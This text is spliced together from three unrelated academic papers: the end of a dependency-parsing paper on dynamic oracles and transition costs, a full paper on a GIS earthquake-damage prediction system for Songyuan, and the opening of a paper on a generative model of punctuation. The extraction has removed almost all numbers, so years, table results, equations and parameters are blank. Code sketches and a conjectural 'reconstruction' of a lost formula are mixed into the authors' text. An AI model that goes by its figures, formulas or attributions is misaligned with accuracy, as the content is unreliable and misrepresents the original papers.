finally, it will not inter- fere with arcs in b because the buffer remains un- changed. after deriving every arc (x,d) ∈ bh, we remain with at most one (h,x) ∈ bd (because of the single-head constraint). by the same reasoning as above, a sequence of reduce and left-arclb transitions will take us to a configuration where h is on top of the stack without interfering with arcs in a′. we can then derive the arc (h,x) using right-arclb. this does not interfere with arcs re- maining in bh or bd because all such arcs must have their buffer node further down the buffer (due to pro- jectivity). at this point, we have reached a configu- ration cx+ to which the same reasoning applies for the next node x + . hybrid the proof for the hybrid system is very similar but with a slightly different partitioning be- cause of the bottom-up order and the different way of handling right-arcs. easy-first for the easy-first system, we only need to partition arcs into l = {(h,d) |d ∈ λ} and l = {(h,d) |h,d ∈ λ}. the former must already be in a, and for the latter there can be no conflict between arcs as long as we respect the bottom-up ordering. arc-standard unfortunately, arc decomposition does not hold for the arc-standard system. to see why, consider a configuration with the stack σ = a,b,c. the arc (c,b) is reachable via left, the arc (b,a) is reachable via right, left, the arc set a = {(c,b),(b,a)} forms a projective tree and is thus tree consistent, but it is easy to convince oneself that a is not reachable from this configuration. the reason that the above proof technique fails for the arc-standard system is that the arc set correspond- ing to b in the arc-eager system may involve arcs where both nodes are still on the stack, and we can- not guarantee that all projective trees consistent with these arcs can be derived. in the very similar hybrid system, such arcs exist as well but they are limited to arcs of the form (h,d) where h < d and h and d are adjacent on the stack, and this restriction is sufficient to restore arc decomposition. . deriving oracles we now present a procedure for deriving a dynamic oracle for any arc-decomposable system. first of all, we can define a non-deterministic oracle as follows: on(c,t) = {t | t(c) ; t} that is, we allow all transitions after which the goal tree is still reachable. note that if c ; t holds, then the set returned by the oracle is guaranteed to be non-empty. for a sound and complete transition system, we know that initial(w) ; t for any projective dependency tree with yield w , and the or- acle is guaranteed to return a non-empty set as long as we are not in the terminal configuration and have followed transitions suggested by the oracle. in order to extend the non-deterministic oracle to a dynamic oracle, we make use of the transition cost function introduced earlier: od(c,t) = {t | c(t;c,t) = } as already mentioned, we assume here that the cost is the difference in hamming loss between the best tree reachable before and after the transition. as- suming arc decomposition, this is equivalent to the number of gold arcs that are reachable before but not after the transition. for configurations from which t is reachable, the dynamic oracle coincides with the non-deterministic oracle. but for configurations from which t cannot be derived, the dynamic ora- cle returns transitions leading to the best parse a (in terms of hamming distance from t ) which is reach- able from c. this is the behavior expected from a dynamic oracle, as defined in section . . 
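under arc decomposition, the dynamic oracle is simply the set of zero-cost transitions, so once a transition cost function is available the oracle is a one-line filter. a sketch, with cost standing in for the system-specific functions derived in the next subsection:

```python
def dynamic_oracle(c, gold, system, cost):
    """o_d(c, T): the set of transitions with zero cost in configuration c.
    cost(t, c, gold) is the system-specific transition cost C(t; c, T), i.e. the
    number of gold arcs reachable from c but no longer reachable from t(c)."""
    return {t for t in system.legal(c) if cost(t, c, gold) == 0}
```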
thus, in order to derive a dynamic oracle for an arc-decomposable transition system, it is sufficient to show that the transition cost function c(t;c,t) can be computed efficiently for that system. next we show how to do this for the arc-eager, hybrid and easy-first systems. . concrete oracles in a given transition system, the set of individually reachable arcs is relatively straightforward to com- pute. in an arc-decomposable system, we know that any intersection of the set of individually reachable arcs with a projective tree is tree consistent, and therefore also reachable. in particular, this holds for the goal tree. for such systems, we can therefore compute the transition cost by intersecting the set of arcs that are individually reachable from a config- uration with the goal arc set, and see how a given transition affects this set of reachable arcs. arc-eager in the arc-eager system, an arc (h,d) is reachable from a configuration c if one of the following conditions hold: ( ) (h,d) is already derived ((h,d) ∈ ac); ( ) h and d are in the buffer; ( ) h is on the stack and d is in the buffer; ( ) d is on the stack and is not assigned a head and h is in the buffer. the framework is easily adapted to a different cost function such as weighted hamming cost, where different gold arcs are weighted differently. in fact, in order to use the dynamic oracle with our current learning algorithm, we do not need the full power of the cost function: it is sufficient to distinguish between transitions with zero cost and transitions with non-zero cost. the cost function for a configuration of the form c = (σ|s,b|β,a) can be calculated as follows: • c(left;c,t): adding the arc (b,s) and pop- ping s from the stack means that s will not be able to acquire any head or dependents in β. the cost is therefore the number of arcs in t of the form (k,s) or (s,k) such that k ∈ β. note that the cost is for the trivial case where (b,s) ∈ t , but also for the case where b is not the gold head of s but the real head is not in β (due to an erroneous previous transition) and there are no gold dependents of s in β. • c(right;c,t): adding the arc (s,b) and pushing b onto the stack means that b will not be able to acquire any head in σ or β, nor any dependents in σ. the cost is therefore the num- ber of arcs in t of the form (k,b), such that k ∈ σ ∪ β, or of the form (b,k) such that k ∈ σ and there is no arc (x,k) in ac. note again that the cost is for the trivial case where (s,b) ∈ t , but also for the case where s is not the gold head of b but the real head is not in σ or β (due to an erroneous previous transition) and there are no gold dependents of b in σ. • c(reduce;c,t): popping s from the stack means that s will not be able to acquire any de- pendents in b = b|β. the cost is therefore the number of arcs in t of the form (s,k) such that k ∈ b. while it may seem that a gold arc of the form (k,s) should be accounted for as well, note that a gold arc of that form, if it exists, is already accounted for by a previous (erroneous) right transition when s acquired its head. • c(shift;c,t): pushing b onto the stack means that b will not be able to acquire any head or dependents in s = s|σ. the cost is therefore the number of arcs in t of the form (k,b) or (b,k) such that k ∈ s and (for the second case) there is no arc (x,k) in ac. this is a slight abuse of notation, since for the shift tran- sition s may not exist, and for the reduce transition b may not exist. 
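the arc-eager cost cases above translate almost line by line into code. a sketch using the configuration layout sketched earlier (stack top = stack[-1], buffer front = buffer[0]) and representing the gold tree as a set of (head, dependent) pairs; the handling of a possibly missing s or b mirrors the footnote about notation.

```python
def arc_eager_cost(t, c, gold):
    """transition cost C(t; c, T) for the arc-eager system.
    gold is a set of (head, dependent) pairs; c.arcs holds (head, label, dep) triples."""
    s = c.stack[-1] if c.stack else None     # may be absent for shift
    b = c.buffer[0] if c.buffer else None    # may be absent for reduce
    sigma, beta = c.stack[:-1], c.buffer[1:]
    headed = {d for (_, _, d) in c.arcs}     # nodes that already have a head in A_c

    if t == "left_arc":
        # s loses any head or dependents still in beta
        return sum(1 for k in beta if (k, s) in gold or (s, k) in gold)
    if t == "right_arc":
        # b loses heads in sigma and beta, and any still-headless dependents in sigma
        return (sum(1 for k in list(sigma) + list(beta) if (k, b) in gold)
                + sum(1 for k in sigma if (b, k) in gold and k not in headed))
    if t == "reduce":
        # s loses any dependents anywhere in the buffer
        return sum(1 for k in c.buffer if (s, k) in gold)
    if t == "shift":
        # b loses any head or (still-headless) dependents anywhere in the stack
        return (sum(1 for k in c.stack if (k, b) in gold)
                + sum(1 for k in c.stack if (b, k) in gold and k not in headed))
    raise ValueError(t)
```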
while very similar to the presentation in goldberg and nivre ( ), this version includes a small correction to the right and shift transitions.

hybrid in the hybrid system, an arc (h,d) is reachable from a configuration c if one of the following conditions holds: (1) (h,d) is already derived ((h,d) ∈ ac); (2) h and d are in the buffer; (3) h is on the stack and d is in the buffer; (4) d is on the stack and h is in the buffer; (5) d is in stack location i and h is in stack location i−1 (that is, the stack has the form σ = . . . ,h,d, . . .). the cost function for a configuration of the form c = (σ|s1|s0, b|β, a) can be calculated as follows:
• c(left;c,t): adding the arc (b,s0) and popping s0 from the stack means that s0 will not be able to acquire heads from h = {s1} ∪ β and will not be able to acquire dependents from d = {b} ∪ β. the cost is therefore the number of arcs in t of the form (s0,d) and (h,s0) for h ∈ h and d ∈ d.
• c(right;c,t): adding the arc (s1,s0) and popping s0 from the stack means that s0 will not be able to acquire heads or dependents from b = {b} ∪ β. the cost is therefore the number of arcs in t of the form (s0,d) and (h,s0) for h,d ∈ b.
• c(shift;c,t): pushing b onto the stack means that b will not be able to acquire heads from h = {s1} ∪ σ, and will not be able to acquire dependents from d = {s0,s1} ∪ σ. the cost is therefore the number of arcs in t of the form (b,d) and (h,b) for h ∈ h and d ∈ d. (note again that s0 may be missing in the case of shift, and s1 in the case of shift and left.)

easy-first in the easy-first system, an arc (h,d) is reachable from a configuration c if one of the following conditions holds: (1) (h,d) is already derived ((h,d) ∈ ac); (2) h and d are in the list λ. when adding an arc (h,d), d is removed from the list λ and cannot participate in any future arcs. thus, a transition has a cost > 0 with respect to a tree t if one of the following holds: (1) it adds an arc (h,d) such that (h′,d) ∈ t for some h′ ∈ λ, h′ ≠ h; (2) it adds an arc (h,d) such that (d,d′) ∈ t for some d′ ∈ λ. the exact cost can be calculated by counting the number of such arcs.

experiments and results
setup, data and parameters the goal of our experiments is to evaluate the utility of the dynamic oracles for training, by comparing a training scenario which only sees configurations that can lead to the gold tree (following a static oracle for the left-to-right systems and a non-deterministic but incomplete oracle for the easy-first system), against a training scenario that involves exploration of incorrect states, using the dynamic oracles. as our training algorithm involves a random component (we shuffle the sentences prior to each iteration, and randomly select whether to follow a correct or incorrect action), we evaluate each setup five times using different random seeds, and report the averaged results. we perform all of the experiments on the multilingual conll data sets. we use training iterations for the left-to-right parsers, and training iterations for the easy-first parser.
we use the standard perceptron update as our update rule in training, and use the averaged weight vector for prediction at test time. the feature sets differ by transition system but are kept the same across data sets. the exact feature-set definitions for the different systems are available in the accompanying software, which is available online at the first author's homepage.

effect of exploration parameters in an initial set of experiments, we investigate the effect of the exploration parameters k and p on the arc-eager system. the results are presented in figure . [figure : effect of k (y axis) and p (x axis) values on parsing accuracies for the arc-eager system on the various conll shared-task languages (arabic, basque, catalan, chinese, czech, english, greek, hungarian, italian, turkish); each point is an average uas of runs with different seeds. the general trend is that smaller k and higher p are better.] while the optimal parameters vary by data set, there is a clear trend toward lower values of k and higher values of p. this is consistent with the report of goldberg and nivre ( ), who used a fixed small value of k and large value of p throughout their experiments.

training with exploration for the various systems for the second experiment, in which we compared training with a static oracle to training with exploration, we fixed the exploration parameters k and p to the same values for all data sets and transition-system combinations. the results in terms of labeled accuracies (for the left-to-right systems) and unlabeled accuracies (for all systems) are presented in table . [table : results on the conll data sets (uas and las, including punctuation) for hungarian, chinese, greek, czech, basque, catalan, english, turkish, arabic and italian; rows compare eager:static, eager:dynamic, hybrid:static, hybrid:dynamic, easyfirst:static and easyfirst:dynamic for uas, and eager:static, eager:dynamic, hybrid:static and hybrid:dynamic for las. each number is an average over runs with different randomization seeds; all experiments used the same exploration parameters k and p.] training with exploration using the dynamic oracles yields improved accuracy for the vast majority of the setups. the notable exceptions are the arc-eager and easy-first systems for unlabeled italian and the arc-hybrid system in catalan, where we observe a small drop in accuracy. however, we can safely conclude that training with exploration is beneficial, and note that we may get even further gains in the future using better methods for tuning the exploration parameters or better training methods.

related work the error propagation problem for greedy transition-based parsing was diagnosed by mcdonald and nivre ( ) and has been tackled with a variety of techniques including parser stacking (nivre and mcdonald, ; martins et al., ) and beam search and structured prediction (zhang and clark, ; zhang and nivre, ). the technique called bootstrapping in choi and palmer ( ) is similar in spirit to training with exploration but is applied iteratively in batch mode and is only approximate due to the use of static oracles. dynamic oracles were first explored by goldberg and nivre ( ). in machine learning more generally, our approach can be seen as a problem-specific instance of imitation learning (abbeel and ng, ; vlachos, ; he et al., ; daumé iii et al., ; ross et al., ), where the dynamic oracle is used to implement the optimal expert needed in the imitation learning setup. indeed, our training procedure is closely related to dagger (ross et al., ), which also trains a classifier to match an expert on a distribution of possibly suboptimal states obtained by running the system itself.
our training procedure can be viewed as an online version of dagger (he et al., ) with two extensions: first, our learn- ing algorithm involves a stochastic policy parame- terized by k, p for choosing between the oracle or the model prediction, whereas dagger always fol- lows the system’s own prediction (essentially run- ning with k = , p = ). the heatmaps in figure show that this parameterization is beneficial. sec- ond, while dagger assumes an expert providing a single label at each state, our oracle is nondetermin- istic and allows multiple correct labels (transitions) which our training procedure tie-breaks according to the model’s current prediction, a technique that has recently been proposed in an extension to dagger by he et al. ( ). other related approaches in the machine learning literature include stacked sequen- tial learning (cohen and carvalho, ), laso (daumé iii and marcu, ), searn (daumé iii et al., ) and smile (ross and bagnell, ). conclusion in this paper, we have extended the work on dynamic oracles presented in goldberg and nivre ( ) in several directions by giving formal characterizations of non-deterministic and complete oracles, defining the arc-decomposition property for transition sys- tems, and using this property to derive novel com- plete non-deterministic oracles for the hybrid and easy-first systems (as well as a corrected oracle for the arc-eager system). we have then used the com- pleteness of these new oracles to improve the train- ing procedure of greedy parsers to include explo- rations of configurations which result from incor- rect transitions. for all three transition systems, we get substantial accuracy improvements on many lan- guages. as the changes all take place at training time, the very fast running time of the greedy algo- rithm at test time is maintained. references pieter abbeel and andrew y ng. . apprenticeship learning via inverse reinforcement learning. in pro- ceedings of the st international conference on ma- chine learning (icml), page . jinho d. choi and martha palmer. . getting the most out of transition-based dependency parsing. in proceedings of the th annual meeting of the asso- ciation for computational linguistics: human lan- guage technologies, pages – . william w. cohen and vitor r. carvalho. . stacked sequential learning. in proceedings of the inter- national joint conference on artificial intelligence, pages – . hal daumé iii and daniel marcu. . learning as search optimization: approximate large margin meth- ods for structured prediction. in proceedings of the nd international conference on machine learning, pages – . hal daumé iii, john langford, and daniel marcu. . search-based structured prediction. machine learn- ing, : – . yoav goldberg and michael elhadad. . an effi- cient algorithm for easy-first non-directional depen- dency parsing. in human language technologies: the annual conference of the north american chapter of the association for computational linguis- tics (naacl hlt), pages – . yoav goldberg and joakim nivre. . a dynamic or- acle for arc-eager dependency parsing. in proceed- ings of the th international conference on compu- tational linguistics (coling), pages – . he he, hal daumé iii, and jason eisner. . imitation learning by coaching. in advances in neural informa- tion processing systems . liang huang and kenji sagae. . dynamic program- ming for linear-time incremental parsing. in proceed- ings of the th annual meeting of the association for computational linguistics (acl), pages – . 
terry koo and michael collins. . efficient third- order dependency parsers. in proceedings of the th annual meeting of the association for computational linguistics (acl), pages – . marco kuhlmann, carlos gómez-rodrı́guez, and gior- gio satta. . dynamic programming algorithms for transition-based dependency parsers. in proceed- ings of the th annual meeting of the association for computational linguistics (acl), pages – . andré filipe martins, dipanjan das, noah a. smith, and eric p. xing. . stacking dependency parsers. in proceedings of the conference on empirical meth- ods in natural language processing (emnlp), pages – . ryan mcdonald and joakim nivre. . charac- terizing the errors of data-driven dependency parsing models. in proceedings of the joint conference on empirical methods in natural language process- ing and computational natural language learning (emnlp-conll), pages – . ryan mcdonald, koby crammer, and fernando pereira. . online large-margin training of dependency parsers. in proceedings of the rd annual meeting of the association for computational linguistics (acl), pages – . joakim nivre and ryan mcdonald. . integrating graph-based and transition-based dependency parsers. in proceedings of the th annual meeting of the as- sociation for computational linguistics (acl), pages – . joakim nivre. . an efficient algorithm for pro- jective dependency parsing. in proceedings of the th international workshop on parsing technologies (iwpt), pages – . joakim nivre. . incrementality in deterministic de- pendency parsing. in proceedings of the workshop on incremental parsing: bringing engineering and cog- nition together (acl), pages – . joakim nivre. . algorithms for deterministic incre- mental dependency parsing. computational linguis- tics, : – . stéphane ross and j. andrew bagnell. . efficient reductions for imitation learning. in proceedings of the th international conference on artificial intelli- gence and statistics, pages – . stéphane ross, geoffrey j. gordon, and j. andrew bag- nell. . a reduction of imitation learning and structured prediction to no-regret online learning. in proceedings of the th international conference on artificial intelligence and statistics, pages – . andreas vlachos. . an investigation of imitation learning algorithms for structured prediction. in pro- ceedings of the european workshop on reinforcement learning (ewrl), pages – . yue zhang and stephen clark. . a tale of two parsers: investigating and combining graph-based and transition-based dependency parsing. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – . yue zhang and joakim nivre. . transition-based dependency parsing with rich non-local features. in proceedings of the th annual meeting of the asso- ciation for computational linguistics: human lan- guage technologies, pages – . 
international conference on sensor network and computer engineering (icsnce)

earthquake damage predicting system of songyuan based on gis
su zhenjiang, huang meng*, xie shaohui, zhang dian, wang zhe
institute of disaster prevention / the gis association of the institution of disaster prevention, beijing, china

abstract—with the rapid development of cities, research on urban seismic damage prediction should make a breakthrough based on modern technology. the paper takes songyuan of jilin province as the research object and creates a spatial database from field data and baidu maps. we simulate the earthquake by using the seismic intensity algorithm of the point source and the line source, and use the spatial analysis method of php+gis to simulate the influence of different earthquake levels on the urban buildings of songyuan. at the same time, php, html and a dynamic cutting technique were used to evaluate the disaster within minutes after the earthquake. this system will provide technical support for the prevention of earthquake damage in songyuan.

keywords-earthquake damage prediction; songyuan; baidu maps api; rapid assessment

i. introduction
with the rapid development of the chinese economy and the urbanization process, more and more attention should be paid to the potential threat of earthquakes to people's lives and property. if we can use gis technology to simulate the loss that may be caused by an earthquake before the disaster, and estimate the severely affected area so as to narrow the scope of rescue, it will provide management and decision-making institutions with reliable technical support. therefore, it is very meaningful to develop a gis-based earthquake hazard prediction system. gis technology, with its intuitive characteristics, is widely used in various fields. for example, in , professor yuan longbo of the school of civil and hydraulic engineering of dalian university of technology built an earthquake predicting system for urban lifelines based on gis, which gave a rational analysis of the influence of pipe-network connectivity and damage, but did not comprehensively discuss the influence of the pipeline network on urban buildings. in , zhao qi, a director of the structural engineering and disaster prevention research institute of tongji university, studied the application of high-resolution remote sensing images in rapid prediction of earthquake disasters in urban areas. this technology suits the needs of large-scale regional earthquake damage prediction, but because remote sensing satellites cannot provide real-time images, it cannot meet the requirements of post-earthquake rapid assessment. in , wang dongming, a researcher at the china earthquake prevention center, studied an urban earthquake damage prediction virtual simulation system. professor wang adopted city simulation based on vr technology, but the overall development cost is high, which is not conducive to promotion.
in , xiao xinghui, a teacher of china ocean university, made a prediction model of urban bridge seismic damage based on least squares support vector machine, which is mainly aimed at the study of urban bridges, but didn’t study the seismic modeling of urban buildings. to summary, although many researchers have made different directions for urban earthquake damage prediction, but for the rapid assessment of urban construction disaster is still left blank. therefore, the paper, through the study on earthquake damage prediction and the feasibility of software implementation, has developed an earthquake intensity model software aimed at songyuan, jilin province, and it also is a platform for analysis that can be combined with multiple factors to give disaster assessment and rescue information. international conference on sensor network and computer engineering (icsnce ) ii. system design a. design of systematic framework figure . functional structure diagram figure . technical flow chart b. database the correctness of the prediction results of the earthquake predicting system in songyuan depends on the reliability of the data source. this project lasted more than a year, we carried out comprehensive field survey and data collection of more than buildings located at ningjiang district, fuyu city, qian'an county, changling county and ross mongolian autonomous county in songyuan, which finally collected about thousand complete messages. the coordinate system in map is beijing coordinate system, and the coordinates of building are shp format data through the field research. the map component is used baidu maps interface. because its own coordinates, we need a coordinate conversion. there are many methods for coordinate conversion, and this system uses recursive callback method requesting api for batch processing of coordinate data. many articles are described in detail about the method, so we don't go into details. another place to be pretreated is the vulnerability of building structures to different seismic grades. for this point, the paper draws on the study of the seismic performance of buildings by yi qian researcher, carries out the prediction examples based on the damage of shenyang and wuhan city, combined with the data of the existing foundation, and uses the vulnerability of building structures to earthquake disaster prediction science describing failure degree of building and loss of the city under different intensity earthquake damage. the specific algorithm is as follows: vulnerability of the building structure is the probability or possibility of a certain degree of damage occurring under the determined earthquake intensity. china earthquake intensity table to the building's damage level is divided into basic intact, minor damage, moderate damage, serious damage and destruction of five grades. the researchers divided our buildings into four categories according to the vulnerability level. class a mainly includes multi-storey steel and reinforced concrete structures, and the seismic capacity is the best. class b mainly includes brick structure, industrial building and the seismic capacity is inferior to class a; class c mainly includes without formal design, open brick structure; d class for the soil structure, is the worst type of earthquake resistance. 
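the vulnerability-index equation referred to below as equation ( ) did not survive in this copy. based on the surrounding description (a seismic damage matrix giving, for each intensity, the probability of each damage grade, weighted by the damage rate of that grade), one plausible reading of the lost formula is the expected damage rate; this is an assumed reconstruction, not the authors' original equation:

```latex
\mathrm{VID}_I \;=\; \sum_{j} P_I(D_j)\,\mu(D_j)
```

here P_I(D_j) would be the damage-matrix entry for intensity I and damage grade D_j, and μ(D_j) the damage rate associated with grade D_j.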
( ) in the formula, vid is the structural vulnerability index, it is the seismic damage matrix of building, i means the seismic intensity, dj means the damage level of the house, it is the damage rate of the house when the j damage occurs. the smaller the vulnerability index is, the better the seismic capacity of structure is, and the smaller the earthquake loss is. this project combines the historical seismic damage statistics method and test method, through the collection of buildings under different intensities of damage degree of seismic data in recent years, the analysis of the vulnerability of different types of buildings, combined with the test method to simulate the specific building and the corresponding experimental results and got the intensity of vulnerability index, then fitting out the fragility curves of all kinds of buildings. for example, the project survey in ningjiang district of songyuan city is a high-rise concrete building, according to the fragility curves of the building. the building is estimated at six level showed a good intensity, showing good intensity at level seven, damaged in eight level intensity, in nine levels of intensity is moderate international conference on sensor network and computer engineering (icsnce ) damage, severe in the ten stage damage intensity. part of the field of the building database is shown in figure : figure . schematic diagram of database vulnerability c. database design database plays an important role in the system platform, so it is very important to design a reasonable database structure. the population, economic and geographical data from different data source formats such as txt text format, excle format, and shp format, we need to provide for different kinds of data sources in the database data entry interface. at the same time, when the database is built, the data redundancy and the feasibility of the later maintenance are also need to be considered. through several design schemes, the relational database scheme with the building number as the unique identifier and the multi table association is adopted. table i. the main field and description field table field name explanation buildingnumber primary key column, used for field matching, multi-table joint query x y actual coordinates, through the actual investigation baidu_x baidu_y baidu coordinates, through the actual coordinates of the building coordinates obtained after conversion propertytype building type, used to screen different types of buildings nameofhous head of household name constructionage building age sixdegrearthdam sevendegrearthdam eightdegrearthdam ninedegrearthdam tendegrearthdam building vulnerability level, damage degree of housing at different intensity levels this project implements the data import interface for different data sources, and add the relevant attribute information according to the building number to dynamically. taking into account the late housing information replacement, this project provides an interface for dynamically modifying updated data. with this kind of interface, all data can be updated in real time. iii. styling system implementation this paper is based on the point set and line set data from songyuan city survey, using baidu map to display the building information and lifeline engineering in songyuan. the seismic intensity model of point source and line source is used to simulate the earthquake, and the earthquake disaster and building damage are evaluated automatically. 
user can export the result to a document and export the relevant word document according to the requirement. here we give a preliminary demonstration of the key functional algorithm ideas:

a. elliptic intensity attenuation method
in seismic safety evaluation, earthquake zoning and post-earthquake rapid assessment, the attenuation relation of earthquake intensity, as an important indicator of earthquake motion, shows obvious regionality. because of the typical plain landform of songyuan city and the large body of mature research on elliptical intensity attenuation, the paper adopts the intensity attenuation relation for line-source earthquakes in north china proposed by sha haijun as the attenuation model for songyuan. the relation gives the intensity i along each axis as a function of the magnitude m and of ln(r + r0), where r is the epicentral distance (km); the subscripts l and s denote the long and short axes, and the regression coefficients are the regional constants of the north china relation. the difficulty of this project is combining the elliptical intensity attenuation method with baidu map so as to truly render the elliptical intensity on the map. for this reason, we abstracted it as a mathematical model: f(x, q, r, y) = z, where x is the coordinate of the focal position, q is the earthquake strength, r is the epicentral distance, y is the deflection angle induced by the fault zone, and z is the output set of points. the model is then rewritten in a programming language and implemented as a class, and the coordinates of all points on the intensity map are obtained. for a simulated earthquake, the effect of the long- and short-axis intensity attenuation algorithm is shown in figure .

figure . longitudinal axis elliptical intensity attenuation method

in contrast, the circular intensity attenuation method is relatively simple to implement compared with the ellipse. the circular model assumes that the seismic source is a point source, ignoring the effect of seismic fault rupture on ground motion, so the seismic intensity decreases with increasing epicentral distance. as songyuan is located in the plains, according to the empirical formula of earthquake attenuation, the epicentral intensity i is obtained from the magnitude m plus a constant offset. in general, the higher the intensity, the faster the attenuation: the intensity decays from degrees to degrees
document export document export is a key part of the evaluation system, the user can then manipulate the system to obtain automatically generated documents and data from the composition of the document, which to a large extent save the time to artificially export data. this project uses the phpword class library to complete the requirements for generating documents and formats. and designs the delay module by several dynamic statistics, combined with h latest technology dynamic capture window real-time capture analysis results, finally can be saved in the cache folder. because the thinkphp framework does not provide support for the direct operation of microsoft word and powerpoint, then we change our mind in the windows environment. this project starts by modifying the php configuration file php.ini to start the support of php zip, thus gaining the phpword class library . . - version, and extending the support for ms word and powerpoint. because the phpword class library is a class library edited abroad, there still exists the problem of chinese garbled code. it will translate the input text into utf _ encode code. that is to say, using gbk, gb or utf code will appear garbled situation, so we use utf encoding. at the same time, we find the utf _encode transcoding in all the methods in the class library, delete them, and use iconv to encode the gbk or gbk code, which can solve the problem better. there are pictures produced in the word document, namely the intensity circle map of the earthquake area, the distribution map of the destruction of the houses in the earthquake area, the pie charts of the houses damaged in the earthquake area, the column of the destruction of the houses in the earthquake area and the architectural situation in the city. each picture is waiting for the page finishes loading through the delay module, real-time dynamic crawl on the window with screenshots of components, and then gain access to the data stream to the interception time to distinguish cached in the corresponding folder. when exporting, we read the cache file, and we insert the picture through the function called addimage. the module can quickly export the electronic documents of damaged buildings after earthquake simulation, and reduce the occupation of computer memory resources by using cache, which has the characteristics of flexibility and portability. the seismic damage prediction results of figure are derived by using word, which is shown in figure : figure . export the document part of the schematic iv. conclusion this paper is based on the theory of earthquake damage prediction for the terrain of songyuan, cleverly combines a variety of methods such as seismic intensity algorithm for point source and line source, php + gis spatial analysis method, php + html + dynamic cutting technology, to apply gis theory to the actual development needs. it’s different from the previous urban earthquake damage prediction system, and the system data sources are more comprehensive and reliable. in the calculation of data processing in this system, the results have been collated in the form of presenting qualified documents, which is very convenient to the user's operation. the system also has room for upgrading, and it is expected to continue to increase the function module of casualties statistics, so as to make the system function more perfect. 
the implementation of the project is based on its rapid exporting of derived products within minutes, which make up for the current earthquake industry in the post earthquake rapid assessment of the blank. the system provides a powerful scientific basis for improving the ability international conference on sensor network and computer engineering (icsnce ) of urban earthquake prevention and disaster reduction by revealing the weak links of urban building earthquake. at the same time, it also provides some technical support for earthquake damage prediction in songyuan. acknowledgments this work was supported by the special fund of fundamental scientific research business expense for higher school of central government (no. zy ). references [ ] yuan yongbo, bai guangbin, zhang mingyuan. gis based prediction system for earthquake damage of urban lifelines liaoning university of technology and technology (natural science edition, december ) technology based on gis in changchun city earthquake damage prediction technology - [ ] zhao qi, zhai yong-mei, li tiezheng application of high-resolution remote sensing image in urban rapid earthquake damage prediction [j]. software journal, , - - [ ] wang dongming, study on virtual simulation system of urban earthquake damage prediction [j]. china earthquake disaster prevention center, , - - [ ] zhang yu, kang jianhong, wei meixuan, li na, yang qing, study on prediction model of earthquake damage of urban bridge based on least squares support vector machine. geophysical and geochemical exploration, , ( ); - - [ ] wu qing, gao mengtan. study on historical earthquake magnitude and epicenter using elliptical intensity attenuation relationship [j]. institute of geophysics, china earthquake administration, , : - . transactions of the association for computational linguistics, vol. , pp. – , . action editor: trevor cohn. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. a generative model for punctuation in dependency trees xiang lisa li⇤ and dingquan wang⇤ and jason eisner department of computer science, johns hopkins university xli @jhu.edu, {wdd,jason}@cs.jhu.edu abstract treebanks traditionally treat punctuation marks as ordinary words, but linguists have suggested that a tree’s “true” punctuation marks are not observed (nunberg, ). these latent “underlying” marks serve to delimit or separate constituents in the syn- tax tree. when the tree’s yield is rendered as a written sentence, a string rewriting mech- anism transduces the underlying marks into “surface” marks, which are part of the ob- served (surface) string but should not be re- garded as part of the tree. we formalize this idea in a generative model of punc- tuation that admits efficient dynamic pro- gramming. we train it without observing the underlying marks, by locally maximiz- ing the incomplete data likelihood (simi- larly to the em algorithm). when we use the trained model to reconstruct the tree’s underlying punctuation, the results appear plausible across languages, and in par- ticular are consistent with nunberg’s anal- ysis of english. we show that our gener- ative model can be used to beat baselines on punctuation restoration. also, our recon- struction of a sentence’s underlying punctu- ation lets us appropriately render the surface punctuation (via our trained underlying-to- surface mechanism) when we syntactically transform the sentence. 
introduction
punctuation enriches the expressiveness of written language. when converting from spoken to written language, punctuation indicates pauses or pitches; expresses propositional attitude; and is conventionally associated with certain syntactic constructions such as apposition, parenthesis, quotation, and conjunction. in this paper, we present a latent-variable model of punctuation usage, inspired by the rule-based approach to english punctuation of nunberg ( ). training our model on english data learns rules that are consistent with nunberg's hand-crafted rules. our system is automatic, so we use it to obtain rules for arabic, chinese, spanish, and hindi as well. moreover, our rules are stochastic, which allows us to reason probabilistically about ambiguous or missing punctuation. across the languages, our model predicts surface punctuation better than baselines, as measured both by perplexity (§ ) and by accuracy on a punctuation restoration task (§ . ). we also use our model to correct the punctuation of non-native writers of english (§ . ), and to maintain natural punctuation style when syntactically transforming english sentences (§ . ). in principle, our model could also be used within a generative parser, allowing the parser to evaluate whether a candidate tree truly explains the punctuation observed in the input sentence (§ ).

punctuation is interesting in the linguistics of punctuation, nunberg ( ) argues that punctuation (in english) is more than a visual counterpart of spoken-language prosody, but forms a linguistic system that involves "interactions of point indicators (i.e. commas, semicolons, colons, periods and dashes)." he proposes that, much as in phonology (chomsky and halle, ), a grammar generates underlying punctuation which then transforms into the observed surface punctuation. consider generating a sentence from a syntactic grammar as follows:

hail the king [, arthur pendragon ,] [, who wields [ “ excalibur ” ] ,] .

although the full tree is not depicted here, some of the constituents are indicated with brackets. in this underlying generated tree, each appositive np is surrounded by commas. on the surface, however, the two adjacent commas after pendragon will now be collapsed into one, and the final comma will be absorbed into the adjacent period. furthermore, in american english, the typographic convention is to move the final punctuation inside the quotation marks. thus a reader sees only this modified surface form of the sentence:

hail the king, arthur pendragon, who wields “excalibur.”

note that these modifications are string transformations that do not see or change the tree. the resulting surface punctuation marks may be clues to the parse tree, but (contrary to nlp convention) they should not be included as nodes in the parse tree. only the underlying marks play that role.
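the underlying-to-surface transformations in the king-arthur example can be mimicked with a toy rewriting pass over the punctuation tokens. the sketch below implements only three simplified interactions (collapsing doubled commas, absorbing a comma into a following period, and the american-style transposition that puts a final period or comma inside the quotes), treats quotes as a single undifferentiated token, and is an illustration of the idea rather than the paper's trained noisy channel.

```python
# ordered rewrite rules over adjacent punctuation tokens (a small, simplified subset)
RULES = [
    ((",", ","), (",",)),       # point absorption:   , ,  ->  ,
    ((",", "."), (".",)),       # period absorption:  , .  ->  .
    (('"', "."), (".", '"')),   # quote transposition (american style): " .  ->  . "
    (('"', ","), (",", '"')),   # quote transposition: " ,  ->  , "
]

def to_surface(tokens):
    """toy left-to-right rewriting of underlying punctuation into surface form;
    rules are applied in priority order until nothing changes."""
    toks = list(tokens)
    changed = True
    while changed:
        changed = False
        for pattern, replacement in RULES:
            for i in range(len(toks) - 1):
                if tuple(toks[i:i + 2]) == pattern:
                    toks[i:i + 2] = list(replacement)
                    changed = True
                    break
            if changed:
                break
    return toks

# the two underlying slots from the example: after "pendragon" and at the sentence end
print(to_surface([",", ","]))       # [','] : the doubled comma collapses
print(to_surface(['"', ",", "."]))  # ['.', '"'] : the comma is absorbed, the period moves inside the quotes
```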
